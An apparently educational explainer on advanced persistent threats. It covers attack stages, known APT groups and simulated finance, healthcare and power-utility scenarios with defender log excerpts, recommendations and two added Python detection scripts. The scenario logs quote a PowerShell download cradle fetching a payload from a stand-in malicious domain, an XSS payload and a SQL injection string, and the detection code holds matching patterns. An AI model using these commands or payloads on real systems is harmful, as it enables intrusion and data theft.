Understanding Advanced Persistent Threat (APT)

Uploaded by mpatil0246

UNDERSTANDING ADVANCED PERSISTENT THREAT (APT) IN CYBERSECURITY WITH EXAMPLES AND SIMULATIONS
BY IZZMIER IZZUDDIN

KEY CHARACTERISTICS OF APT:

1. Advanced: The attackers use advanced techniques to exploit vulnerabilities, including zero-day exploits, spear-phishing, and custom malware. They may also employ various evasion techniques to avoid detection.
2. Persistent: Unlike traditional cyberattacks that are short-lived, APTs involve a long-term presence in the target's environment. The attackers establish persistence by using various methods, such as creating backdoors and obtaining valid user credentials.
3. Targeted: APTs are highly targeted, often focusing on specific organisations, industries, or even individuals. The attackers conduct extensive reconnaissance to understand the target's network, identify valuable data, and plan their attack accordingly.

TYPICAL STAGES OF AN APT ATTACK:

1. Reconnaissance: The attackers gather information about the target organisation, its network, employees, and potential vulnerabilities. This may involve passive methods like OSINT (Open Source Intelligence) or active methods like network scanning and phishing.
2. Initial Compromise: The attackers gain initial access to the target network, typically through spear-phishing, exploiting vulnerabilities, or using stolen credentials.
3. Establishing Persistence: The attackers establish a foothold in the network by installing backdoors, web shells, or creating new user accounts. This ensures they can maintain access even if some entry points are discovered and closed.
4. Privilege Escalation: The attackers seek to escalate their privileges within the network to gain higher levels of access and control. This may involve exploiting additional vulnerabilities or using legitimate tools and credentials.
5. Lateral Movement: The attackers move laterally through the network to find and access other systems and data. They may use techniques like Pass-the-Hash, Pass-the-Ticket, or exploiting trust relationships between systems.
6. Data Exfiltration: The attackers identify and extract valuable data from the target network. This may involve compressing and encrypting data before transferring it to external servers controlled by the attackers.
7. Cleanup: The attackers attempt to cover their tracks by deleting logs, removing tools, and taking other actions to avoid detection and attribution.

HERE IS A LIST OF SOME WELL-KNOWN APT GROUPS:

1. APT1 (Comment Crew)
2. APT3 (Buckeye)
3. APT10 (Stone Panda)
4. APT28 (Fancy Bear)
5. APT29 (Cozy Bear)
6. APT32 (OceanLotus)
7. APT33 (Elfin)
8. APT34 (OilRig)
9. APT35 (Charming Kitten)
10. APT36 (Transparent Tribe)
11. APT37 (Reaper)
12. APT38 (Lazarus Group)
13. APT39 (Chafer)
14. APT40 (Periscope)
15. APT41 (Double Dragon)

EXAMPLES WITH SCENARIO AND SIMULATIONS

Scenario 1: APT29 Attack on a Financial Institution

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:
o Detection of suspicious activity scanning for open ports on the financial institution’s public web servers.
o Time: 2024-08-01 09:00:00
o Source IP: 185.70.40.10
o Destination IP: 10.0.0.100
o Ports Scanned: 80, 443, 3389

Analyst Comment: The scanning of ports 80 (HTTP), 443 (HTTPS), and 3389 (RDP)
indicates reconnaissance activity to find vulnerable services.

Stage 2: Initial Compromise

Objective: Gain initial access through spear-phishing.

Logs and Analysis:

• Email Gateway Logs:
o Spear-phishing email sent to a senior executive.
o Time: 2024-08-01 10:05:12
o From: attacker@phishingdomain.com
o To: executive@financecorp.com
o Subject: Urgent: Updated Financial Report
o Attachment: Financial_Report.doc (contains malicious macro)
• Endpoint Security Logs:
o Execution of the malicious macro leading to the download of a Cobalt Strike beacon.
o Time: 2024-08-01 10:10:30
o Source IP: 10.0.0.101
o Destination URL: http://maliciousdomain.com/beacon

Analyst Comment: The spear-phishing email with a malicious macro attachment resulted in the download and execution of a Cobalt Strike beacon, indicating a successful initial compromise.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.


Logs and Analysis:

• EDR Logs:
o Creation of a scheduled task to maintain persistence.
o Time: 2024-08-01 10:30:45
o Host: EXEC-PC
o Task Name: UpdateChecker
o Command: C:\Windows\System32\cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousdomain.com/payload')"

Analyst Comment: The creation of a scheduled task named "UpdateChecker" with a command to download a payload indicates the attacker is establishing persistence.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a known exploit.

Logs and Analysis:

• EDR Logs:
o Execution of an exploit for privilege escalation.
o Time: 2024-08-01 11:00:25
o Host: EXEC-PC
o Process: exploit.exe
o Privileges: SYSTEM

Analyst Comment: The execution of a privilege escalation exploit resulted in SYSTEM-level privileges, allowing the attacker full control over the compromised system.

Stage 5: Lateral Movement

Objective: Move through the network to access sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:
o Unusual SMB connections from the compromised executive's PC to the financial data server.
o Time: 2024-08-01 11:30:00
o Source IP: 10.0.0.101
o Destination IP: 10.0.0.200
o Protocol: SMB

Analyst Comment: The unexpected SMB connections from the compromised PC to the
financial data server indicate lateral movement within the network.

Stage 6: Data Exfiltration


Objective: Extract sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:
o Large data transfers to an external server using HTTPS.
o Time: 2024-08-01 12:00:45
o Source IP: 10.0.0.200
o Destination IP: 185.70.40.20 (attacker-controlled server)
o Data Transferred: 5GB

Analyst Comment: The significant data transfer to an external server using HTTPS
indicates data exfiltration activities.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:
o Deletion of system logs using a log cleaning tool.
o Time: 2024-08-01 12:30:55
o Host: EXEC-PC
o Event ID: 1102
o Action: System Event Log Cleared

Analyst Comment: The clearing of system event logs using a tool indicates the attacker
is attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack: The attack began with reconnaissance, where the attacker
scanned public web servers for open ports. The initial compromise was achieved
through a spear-phishing email targeting a senior executive, leading to the execution of
a Cobalt Strike beacon. Persistence was established by creating a scheduled task to
download a payload. The attacker escalated privileges to SYSTEM using a known exploit
and moved laterally within the network by making SMB connections to the financial
data server. Data exfiltration occurred via large data transfers to an external server
using HTTPS. Finally, the attacker attempted to clean up by deleting system event logs.

Recommendations:

1. Email Security:
o Implement advanced email filtering and phishing protection.
o Conduct regular phishing awareness training for employees, especially
high-ranking executives.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the execution of malicious macros and
exploits.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as unexpected SMB
connections and large data transfers.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as the creation of scheduled tasks and log deletion.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.

Tools Used by the Attacker:

• Cobalt Strike: For initial compromise and beacon deployment.
• PowerShell: For persistence with scheduled tasks.
• Exploit.exe: For privilege escalation.
• SMB Protocol: For lateral movement.
• HTTPS: For data exfiltration.
• Log Cleaning Tool: For cleanup and evasion.

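
The seven stages of Scenario 1 can be reconstructed mechanically from the telemetry listed above. The Python below is an added illustration, not code from the original document: it runs one simple detector per stage over constructed records that mirror the scenario's log fields; the 10.0.0.0/24 range, the SMB allowlist, the macro extension list and the thresholds are assumptions.

```python
"""Correlate Scenario 1's telemetry into an APT stage timeline.

Added example, not code from the original document. The records below
are constructed dicts modelled on the fields the scenario lists; the
address range, the SMB allowlist and the thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

INTERNAL_NET = "10.0.0."          # assumption: the institution's address range
DATA_SERVERS = {"10.0.0.200"}     # assumption: hosts holding financial data
SMB_ALLOWED = {"10.0.0.5"}        # assumption: hosts permitted to speak SMB to data servers
EXFIL_BYTES = 1024 ** 3           # assumption: alert above 1 GB sent to an external host
SCAN_PORTS, SCAN_WINDOW = 3, timedelta(seconds=60)
MACRO_EXTS = (".doc", ".docm", ".xls", ".xlsm")
# Download-cradle markers taken from the scenario's scheduled-task command.
CRADLE = [r"powershell", r"-w\s+hidden|-nop", r"\bIEX\b|Invoke-Expression", r"DownloadString"]

# Constructed records: (time, log source, fields).
EVENTS = [
    ("2024-08-01 09:00:00", "net", {"src": "185.70.40.10", "dst": "10.0.0.100", "dport": 80}),
    ("2024-08-01 09:00:01", "net", {"src": "185.70.40.10", "dst": "10.0.0.100", "dport": 443}),
    ("2024-08-01 09:00:02", "net", {"src": "185.70.40.10", "dst": "10.0.0.100", "dport": 3389}),
    ("2024-08-01 10:05:12", "mail", {"from": "attacker@phishingdomain.com", "to": "executive@financecorp.com",
                                    "attachment": "Financial_Report.doc", "has_macro": True}),
    ("2024-08-01 10:30:45", "edr", {"host": "EXEC-PC", "event": "task_created", "task": "UpdateChecker",
                                   "cmd": "C:\\Windows\\System32\\cmd.exe /c powershell -nop -w hidden -c "
                                          "\"IEX (New-Object Net.WebClient).DownloadString("
                                          "'http://maliciousdomain.com/payload')\""}),
    ("2024-08-01 11:30:00", "net", {"src": "10.0.0.101", "dst": "10.0.0.200", "dport": 445}),
    ("2024-08-01 12:00:45", "net", {"src": "10.0.0.200", "dst": "185.70.40.20", "dport": 443,
                                   "bytes": 5 * 1024 ** 3}),
]


def is_internal(ip):
    return ip.startswith(INTERNAL_NET)


def detect_port_scan(net):
    """Recon: an external source touching SCAN_PORTS distinct ports on one host within SCAN_WINDOW."""
    by_pair = defaultdict(list)
    for t, f in net:
        by_pair[(f["src"], f["dst"])].append((t, f["dport"]))
    alerts = []
    for (src, dst), hits in by_pair.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - t0 <= SCAN_WINDOW}
            if len(ports) >= SCAN_PORTS and not is_internal(src):
                alerts.append(("Reconnaissance", t0, f"{src} scanned ports {sorted(ports)} on {dst}"))
                break
    return alerts


def detect_macro_mail(mail):
    """Initial compromise: an Office attachment that carries a macro."""
    return [("Initial Compromise", t, f"macro attachment {f['attachment']} from {f['from']} to {f['to']}")
            for t, f in mail if f.get("has_macro") and f["attachment"].lower().endswith(MACRO_EXTS)]


def is_download_cradle(cmd):
    """True when every cradle marker (hidden window / no profile, IEX, DownloadString) is present."""
    return all(re.search(p, cmd, re.I) for p in CRADLE)


def detect_persistence(edr):
    """Persistence: a newly created scheduled task whose command is a download cradle."""
    return [("Establishing Persistence", t, f"task {f['task']} on {f['host']} runs a download cradle")
            for t, f in edr if f.get("event") == "task_created" and is_download_cradle(f["cmd"])]


def detect_lateral_smb(net):
    """Lateral movement: SMB (445) to a data server from an internal host that is not allowlisted."""
    return [("Lateral Movement", t, f"SMB {f['src']} -> {f['dst']}")
            for t, f in net if f["dport"] == 445 and f["dst"] in DATA_SERVERS
            and is_internal(f["src"]) and f["src"] not in SMB_ALLOWED]


def detect_exfil(net):
    """Exfiltration: a large transfer to an external destination, whatever the protocol."""
    return [("Data Exfiltration", t, f"{f['bytes'] // 1024 ** 3} GB {f['src']} -> {f['dst']}:{f['dport']}")
            for t, f in net if not is_internal(f["dst"]) and f.get("bytes", 0) >= EXFIL_BYTES]


def build_timeline(events):
    """Run every detector and return (stage, time, summary) tuples in time order."""
    by_src = defaultdict(list)
    for t, source, fields in events:
        by_src[source].append((datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), fields))
    alerts = (detect_port_scan(by_src["net"]) + detect_macro_mail(by_src["mail"])
              + detect_persistence(by_src["edr"]) + detect_lateral_smb(by_src["net"])
              + detect_exfil(by_src["net"]))
    return [(stage, t.strftime("%Y-%m-%d %H:%M:%S"), what)
            for stage, t, what in sorted(alerts, key=lambda a: a[1])]


if __name__ == "__main__":
    for stage, when, what in build_timeline(EVENTS):
        print(f"{when}  {stage:24} {what}")
```

The privilege escalation and cleanup stages are deliberately left to the EDR and Windows event log, where the process name and Event ID 1102 are the signals; a SIEM would join those records onto the same host and time axis.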
Scenario 2: APT Attack on a Financial Institution

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:
o Detection of port scanning activity targeting the internal banking systems.
o Time: 2024-08-01 08:00:00
o Source IP: 203.0.113.150
o Destination IP: 192.168.2.100
o Ports Scanned: 80, 443, 1433 (SQL Server)
o Analyst Comment: The scanning of web and database ports indicates reconnaissance to identify potential vulnerabilities.

Stage 2: Initial Compromise

Objective: Gain initial access through exploitation of a vulnerable employee portal.

Logs and Analysis:

• Web Server Logs:
o Detection of a Cross-Site Scripting (XSS) attack on the employee portal.
o Time: 2024-08-01 08:30:15
o Source IP: 203.0.113.150
o URL Accessed: /login?username=<script>alert('XSS')</script>
• Database Logs:
o Unauthorised access to employee credentials.
o Time: 2024-08-01 08:35:30
o User: compromised_user
o Query: SELECT * FROM employee_credentials
o Analyst Comment: The XSS attack allowed the attacker to steal employee credentials.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

• Web Server Logs:
o Upload of a backdoor executable disguised as a legitimate file.
o Time: 2024-08-01 08:40:55
o Source IP: 203.0.113.150
o File Uploaded: /uploads/invoice.pdf.exe
o Analyst Comment: The backdoor executable provides the attacker with persistent access.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a local exploit.

Logs and Analysis:

• EDR Logs:
o Execution of a known privilege escalation exploit.
o Time: 2024-08-01 09:00:45
o Host: Employee-PC
o Process: escalate_privileges.exe
o Privileges: Administrator
o Analyst Comment: The execution of the exploit resulted in administrative privileges.

Stage 5: Lateral Movement

Objective: Move through the network to access core banking systems.

Logs and Analysis:

• Network Traffic Logs:
o Unusual SMB connections from the compromised employee PC to the core banking server.
o Time: 2024-08-01 09:30:00
o Source IP: 192.168.2.50
o Destination IP: 192.168.2.20
o Protocol: SMB
o Analyst Comment: The unexpected SMB connections indicate lateral movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:
o Large data transfers to an external server using SFTP.
o Time: 2024-08-01 10:00:45
o Source IP: 192.168.2.20
o Destination IP: 198.51.100.100
o Protocol: SFTP
o Data Transferred: 3GB
o Analyst Comment: The significant data transfer to an external server indicates data exfiltration.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:
o Deletion of system logs using a log cleaning tool.
o Time: 2024-08-01 10:30:55
o Host: Employee-PC
o Event ID: 1102
o Action: Event Log Cleared
o Analyst Comment: The clearing of event logs indicates an attempt to cover tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack: The attack began with reconnaissance, where the attacker
scanned the financial institution’s internal systems for open ports. The initial
compromise was achieved through a Cross-Site Scripting (XSS) attack on the employee
portal, allowing the attacker to steal credentials. Persistence was established by
uploading a backdoor executable. The attacker then escalated privileges to an
administrator using a local exploit. Lateral movement was observed with SMB
connections from the compromised employee PC to the core banking server. Data
exfiltration occurred via SFTP, transferring sensitive financial data to an external server.
Finally, the attacker attempted to clean up by deleting system event logs.

Recommendations:

1. Web Application Security:
o Implement web application firewalls (WAF) to detect and block XSS and other web-based attacks.
o Conduct regular security assessments and code reviews to identify and fix vulnerabilities.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the upload of backdoor executables and
execution of privilege escalation exploits.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as unexpected SMB
connections and large data transfers.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as log clearing and privilege escalation.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.

Scenario 3: APT Attack on a Healthcare Organisation

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:
o Scanning for open ports on critical healthcare systems.
o Time: 2024-08-01 09:00:00
o Source IP: 203.0.113.100
o Destination IP: 192.168.1.250
o Ports Scanned: 80, 443, 3389

Analyst Comment: The scanning of ports 80 (HTTP), 443 (HTTPS), and 3389 (RDP)
indicates reconnaissance activity to find vulnerable services.

Stage 2: Initial Compromise

Objective: Gain initial access through exploitation of a vulnerable web application.

Logs and Analysis:

• Web Server Logs:
o Detection of SQL injection attempts on the patient management system.
o Time: 2024-08-01 09:30:12
o Source IP: 203.0.113.100
o URL Accessed: /patients.php?id=1' OR '1'='1
• Database Logs:
o Unusual queries executed indicating SQL injection success.
o Time: 2024-08-01 09:35:20
o User: webapp
o Query: SELECT * FROM users WHERE '1'='1'

Analyst Comment: The SQL injection attack on the patient management system
resulted in unauthorised access to the database.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.

Logs and Analysis:


• Web Server Logs:
o Upload of a web shell for remote access.
o Time: 2024-08-01 09:40:45
o Source IP: 203.0.113.100
o URL Accessed: /uploads/shell.php

Analyst Comment: The upload of a web shell to the server indicates the attacker is
establishing persistence.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a local exploit.

Logs and Analysis:

• EDR Logs:
o Execution of a known local privilege escalation exploit.
o Time: 2024-08-01 10:00:25
o Host: Web-Server
o Process: exploit.exe
o Privileges: SYSTEM

Analyst Comment: The execution of a local privilege escalation exploit resulted in SYSTEM-level privileges.

Stage 5: Lateral Movement

Objective: Move through the network to access the Electronic Health Record (EHR)
system.

Logs and Analysis:

• Network Traffic Logs:
o Unusual RDP connections from the web server to the EHR server.
o Time: 2024-08-01 10:30:00
o Source IP: 192.168.1.250
o Destination IP: 192.168.1.10
o Protocol: RDP

Analyst Comment: The unexpected RDP connections from the web server to the EHR
server indicate lateral movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive patient data.


Logs and Analysis:

• Network Traffic Logs:
o Data transfers to an external server using FTP.
o Time: 2024-08-01 11:00:45
o Source IP: 192.168.1.10
o Destination IP: 198.51.100.50
o Protocol: FTP
o Data Transferred: 2GB

Analyst Comment: The significant data transfer to an external server using FTP
indicates data exfiltration.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:
o Removal of logs using a log cleaning tool.
o Time: 2024-08-01 11:30:55
o Host: Web-Server
o Event ID: 1102
o Action: Event Log Cleared

Analyst Comment: The clearing of event logs using a tool indicates the attacker is
attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack:

The attack began with reconnaissance, where the attacker scanned critical healthcare
systems for open ports. The initial compromise was achieved through an SQL injection
attack on the patient management system, allowing the attacker to access the
database. Persistence was established by uploading a web shell to the server. The
attacker then escalated privileges to SYSTEM using a local exploit. Lateral movement
was observed with RDP connections from the web server to the EHR server. Data
exfiltration occurred via FTP, transferring sensitive patient data to an external server.
Finally, the attacker attempted to clean up by using a log cleaning tool to delete event
logs.

Recommendations:

1. Web Application Security:
o Implement web application firewalls (WAF) to detect and block SQL injection attempts.
o Conduct regular security assessments and code reviews to identify and fix vulnerabilities.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the upload of web shells and execution of
exploits.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as unexpected RDP
connections and large data transfers.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as log clearing and privilege escalation.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.
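
Scenarios 2 and 3 both start at the web tier (an XSS payload, a SQL injection tautology, an executable or web shell dropped under /uploads/) and are confirmed in the database log. The Python below is an added example rather than code from the document: it parses constructed access-log lines and query records and flags those signals; the upload directory, the extension list and the webapp service account are assumptions.

```python
"""Flag the web-tier compromise and persistence signals from Scenarios 2 and 3.

Added example, not code from the original document. The access-log lines and
database query records are constructed; the upload path, the extension list
and the application account name are assumptions.
"""
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
XSS_RE = re.compile(r"<\s*script|javascript:|\bon(load|error|click|mouseover)\s*=", re.I)
SQLI_RE = re.compile(r"'\s*(or|and)\s*'[^']*'\s*=\s*'|union\s+select|;\s*(drop|insert|update)\b", re.I)
TAUTOLOGY_RE = re.compile(r"'([^']*)'\s*=\s*'\1'")   # the literal '1'='1' seen in the DB log
UPLOAD_DIR = "/uploads/"                               # assumption: the portal's upload location
EXEC_EXTS = {"php", "jsp", "asp", "aspx", "exe", "dll", "ps1", "bat"}
SENSITIVE_TABLES = {"employee_credentials", "users"}
APP_ACCOUNTS = {"webapp"}                              # assumption: accounts expected to read those tables

# Constructed access-log lines (common log format) in the order the scenarios report them.
ACCESS_LOG = """\
203.0.113.150 - - [01/Aug/2024:08:30:15 +0000] "GET /login?username=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1" 200 512
203.0.113.150 - - [01/Aug/2024:08:40:55 +0000] "POST /uploads/invoice.pdf.exe HTTP/1.1" 201 0
203.0.113.100 - - [01/Aug/2024:09:30:12 +0000] "GET /patients.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 8192
203.0.113.100 - - [01/Aug/2024:09:40:45 +0000] "POST /uploads/shell.php HTTP/1.1" 201 0
192.168.2.51 - - [01/Aug/2024:09:41:00 +0000] "GET /patients.php?id=42 HTTP/1.1" 200 1024
"""

# Constructed database query records: (time, user, sql).
DB_LOG = [
    ("2024-08-01 08:35:30", "compromised_user", "SELECT * FROM employee_credentials"),
    ("2024-08-01 09:35:20", "webapp", "SELECT * FROM users WHERE '1'='1'"),
    ("2024-08-01 09:41:00", "webapp", "SELECT name FROM users WHERE id = 42"),
]


def parse_line(line):
    """Parse one common-log-format line; the request path is percent-decoded once for inspection."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["path"])
    return rec


def classify_request(rec):
    """Return (stage, category) for a parsed request, or None when nothing looks hostile."""
    path = rec["decoded"]
    if XSS_RE.search(path):
        return ("Initial Compromise", "xss")
    if SQLI_RE.search(path):
        return ("Initial Compromise", "sqli")
    if rec["method"] == "POST" and path.startswith(UPLOAD_DIR):
        ext = path.rsplit(".", 1)[-1].lower()
        if ext in EXEC_EXTS:        # catches shell.php and the double-extension invoice.pdf.exe
            return ("Establishing Persistence", "executable_upload")
    return None


def scan_access_log(text):
    """Return (ip, time, stage, category, decoded path) for every hostile request."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        hit = classify_request(rec) if rec else None
        if hit:
            findings.append((rec["ip"], rec["time"], hit[0], hit[1], rec["decoded"]))
    return findings


def classify_query(user, sql):
    """Flag tautology predicates and reads of credential tables by accounts that should not touch them."""
    if TAUTOLOGY_RE.search(sql):
        return "tautology_predicate"
    tables = set(re.findall(r"\bfrom\s+(\w+)", sql, re.I))
    if tables & SENSITIVE_TABLES and user not in APP_ACCOUNTS:
        return "sensitive_table_by_unexpected_account"
    return None


def scan_db_log(records):
    return [(t, user, classify_query(user, sql)) for t, user, sql in records if classify_query(user, sql)]


if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_LOG):
        print("WEB", *finding)
    for finding in scan_db_log(DB_LOG):
        print("DB ", *finding)
```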

Scenario 4: APT Attack on a Financial Institution

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:
o Detection of unusual outbound connections to suspicious IP addresses.
o Time: 2024-08-01 08:45:00
o Source IP: 192.168.2.100
o Destination IP: 205.185.123.45
o Ports Scanned: 22, 23, 80, 443

Analyst Comment: The repeated connections to suspicious IP addresses and the scanning of ports 22 (SSH), 23 (Telnet), 80 (HTTP), and 443 (HTTPS) indicate reconnaissance activity to identify vulnerable services.

Stage 2: Initial Compromise

Objective: Gain initial access through a malicious email attachment.

Logs and Analysis:

• Email Gateway Logs:
o Detection of a phishing email with a malicious attachment targeting the finance department.
o Time: 2024-08-01 09:15:30
o From: attacker@maliciousdomain.com
o To: finance@bank.com
o Subject: Urgent: Invoice Payment
o Attachment: invoice.xlsm (SHA256: 1a2b3c4d5e...)
• EDR Logs:
o Execution of a macro from the malicious Excel attachment.
o Time: 2024-08-01 09:20:45
o Host: Finance-PC
o Process: EXCEL.EXE
o Action: Executed macro

Analyst Comment: The execution of a macro from a suspicious Excel attachment suggests a successful phishing attack leading to initial compromise.

Stage 3: Establishing Persistence


Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

• Windows Event Logs:
o Creation of a new scheduled task for persistence.
o Time: 2024-08-01 09:45:00
o Host: Finance-PC
o Event ID: 4698
o Task Name: SystemUpdate
o Action: Scheduled Task Created

Analyst Comment: The creation of a scheduled task named "SystemUpdate" is a common method used by attackers to maintain persistence on a compromised system.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a known vulnerability.

Logs and Analysis:

• EDR Logs:
o Execution of a privilege escalation exploit.
o Time: 2024-08-01 10:00:25
o Host: Finance-PC
o Process: exploit.exe
o Privileges: SYSTEM

Analyst Comment: The execution of a privilege escalation exploit to gain SYSTEM-level privileges is a clear indicator of the attacker's intent to escalate their access.

Stage 5: Lateral Movement

Objective: Move through the network to access critical financial systems.

Logs and Analysis:

• Network Traffic Logs:
o Detection of SMB traffic indicating lateral movement.
o Time: 2024-08-01 10:30:00
o Source IP: 192.168.2.100
o Destination IP: 192.168.2.150
o Protocol: SMB
o Action: File access

Analyst Comment: The increase in SMB traffic between internal systems, especially file access attempts, indicates potential lateral movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:
o Large data transfers to an external server.
o Time: 2024-08-01 11:00:45
o Source IP: 192.168.2.150
o Destination IP: 203.0.113.77
o Data Transferred: 1.5GB

Analyst Comment: The significant data transfer to an external server is a strong indicator of data exfiltration activities.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:
o Use of log cleaning tool to delete system logs.
o Time: 2024-08-01 11:30:55
o Host: Finance-PC
o Event ID: 1102
o Action: System Event Log Cleared

Analyst Comment: The clearing of system event logs using a log cleaning tool indicates
the attacker is attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack:

The attack began with reconnaissance, where the attacker scanned for open ports on
the financial institution's systems. The initial compromise was achieved through a
phishing email containing a malicious Excel attachment that executed a macro.
Persistence was established by creating a scheduled task named "SystemUpdate." The
attacker then escalated privileges to SYSTEM using a known exploit. Lateral movement
was observed with SMB traffic between internal systems. Data exfiltration occurred via
large data transfers to an external server. Finally, the attacker attempted to clean up by
clearing system event logs.

Recommendations:

1. Email Security:
o Implement advanced email filtering and phishing protection.
o Conduct regular phishing awareness training for employees, especially
those in sensitive departments like finance.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the creation of unauthorised scheduled
tasks and execution of macros.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as large data transfers
to external destinations.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as privilege escalation and log clearing.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.

Scenario 5: APT Attack on a Power Utility Company

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:
o Unusual DNS queries to gather information about internal network structure.
o Time: 2024-08-01 08:30:00
o Source IP: 192.168.100.10
o Queried Domain: internal.power-utility.com

Analyst Comment: The repeated DNS queries for internal domains suggest
reconnaissance to map the internal network.

Stage 2: Initial Compromise

Objective: Gain initial access through exploitation of a vulnerable remote desktop protocol (RDP) service.

Logs and Analysis:

• Windows Security Logs:
o Brute-force attempts on RDP service detected.
o Time: 2024-08-01 09:00:00
o Host: SCADA-Server
o Event ID: 4625
o Logon Type: 10 (RemoteInteractive)
o Status: 0xC000006A (Incorrect password)
• Network Traffic Logs:
o Successful RDP connection after multiple failed attempts.
o Time: 2024-08-01 09:05:00
o Source IP: 203.0.113.200
o Destination IP: 192.168.100.20
o Protocol: RDP

Analyst Comment: The successful RDP connection following brute-force attempts indicates the attacker has gained initial access to the SCADA server.

Stage 3: Establishing Persistence


Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

• Windows Event Logs:
o Installation of a remote access tool (RAT) for persistence.
o Time: 2024-08-01 09:30:00
o Host: SCADA-Server
o Event ID: 7045
o Service Name: RemoteAccessService
o Binary Path: C:\Windows\System32\RemoteAccess.exe

Analyst Comment: The installation of a service named "RemoteAccessService" is a method used by attackers to maintain persistence on the compromised system.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a known vulnerability.

Logs and Analysis:

• EDR Logs:
o Execution of a privilege escalation exploit.
o Time: 2024-08-01 10:00:00
o Host: SCADA-Server
o Process: escalate.exe
o Privileges: SYSTEM

Analyst Comment: The execution of a privilege escalation exploit to gain SYSTEM-level privileges indicates the attacker is escalating their access.

Stage 5: Lateral Movement

